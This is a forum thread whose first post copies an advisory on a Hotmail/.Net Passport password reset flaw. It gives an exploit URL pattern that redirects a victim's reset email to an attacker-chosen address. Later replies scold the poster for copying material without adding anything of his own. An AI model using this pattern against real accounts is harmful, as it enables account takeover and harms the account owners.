Jump to content
xisto Community
me-here1405241520

Password Reset Vulnerability

Recommended Posts

is it working now...?

An attacker can reset any Microsoft Hotmail/.Net Passport user accountwith no prior information like state, zip, country, answer to the secret
question and the old password. Normally, a user has to answer the
security questions and than answer the secret question if he wants to
reset his password. By exploiting this vulnerability, an attacker can
submit a specially crafted URL to get the password reset instructions
and reset any user?s password.

TECHNICAL DETAILS

Due to the nature of this vulnerability and the fact that there is no
fix available yet, no technical details are being made available with
this advisory. Full technical details will be made available on our
website once the vulnerability is fixed by Microsoft. Please note that
we were forced to release this information public as these
vulnerabilities are actively being exploited in the wild and are one of
the most severe vulnerabilities ever found in Microsoft Hotmail/.Net
Passport.


The flaw is exploited by opening the following URL in a web browser:

http://forums.xisto.com/no_longer_exists/
&em=victim@hotmail.com&id=&cb=&prefem=where-to@send-the-email.com&rst=

after that, URL which resets the password will be delivered, in this case, to where-to@send-the-email.com.


Edited by me-here (see edit history)

Share this post


Link to post
Share on other sites

For Gods sake, try and provide SOME ORIGINAL INPUT ON YOUR OWN PART. I'm getting tired of warning you and deleting such posts. Don't you have any goddamned opinion on anything on your own? Or do you simply specialize is posting quoted material from other sites?

Share this post


Link to post
Share on other sites

yes the ability to reset a password on the hotmail/msn network is possible, much like the quoted material you posted states. They are currently are working on, or have fixed, that problem already. As for how to do it, thats above my knowledge level, or to be more precise, not what I like to do for fun on my evenings off.As for the post...I have to agree with M^E, of the couple of posts of yours that I have run across they are, umm...Juvenile at best, or in my opinion just this side of spam. Please feel free to contribute to the community, I would love to see you become a strong member here, but please don't post like this anymore, otherwise M^E, Moonwitch, or another of the mods might decide that banning might be the best option.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.